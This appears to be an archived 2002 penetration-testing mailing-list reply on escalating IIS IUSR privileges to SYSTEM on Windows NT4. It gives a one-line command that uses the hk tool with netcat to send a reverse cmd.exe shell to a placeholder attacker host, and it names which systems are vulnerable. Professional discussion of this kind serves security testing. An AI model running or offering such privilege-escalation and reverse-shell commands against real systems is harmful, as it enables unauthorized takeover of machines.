Penetration Testing mailing list archives
Re: escalating IUSR to admin rights via unicode and iis4
From: Daniel Polombo <polombo () cartel-securite fr>
Date: 30 Jul 2002 13:41:19 +0200
Le jeu 11/07/2002 à 19:18, Bill Pennington wrote :
Then just run netcat via hk.exe, connect to the listener, and bingo you are SYSTEM. It has been a while since I have done this so I don't recall the exact syntax but that should get you pointed in the right direction.
hk <command> For instance : hk nc -d -e cmd.exe attacker:port will shovel a shell to attacker:port. Note that hk only works on NT4 (up to sp6a, meaning that most NT boxes you'll ever meet should be vulnerable). For win2k, have a look at DebPloit instead. -- Daniel Polombo Consultant Cartel Sécurité ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- escalating IUSR to admin rights via unicode and iis4 ewvtwvi (Jul 11)
- Re: escalating IUSR to admin rights via unicode and iis4 Bill Pennington (Jul 11)
- Re: escalating IUSR to admin rights via unicode and iis4 Daniel Polombo (Jul 30)
- <Possible follow-ups>
- Re: escalating IUSR to admin rights via unicode and iis4 Jeanette LaRosa (Jul 11)
- Re: escalating IUSR to admin rights via unicode and iis4 juan . francisco . falcon (Jul 11)
- RE: escalating IUSR to admin rights via unicode and iis4 French, Dave (Jul 12)
- Re: escalating IUSR to admin rights via unicode and iis4 Bill Pennington (Jul 11)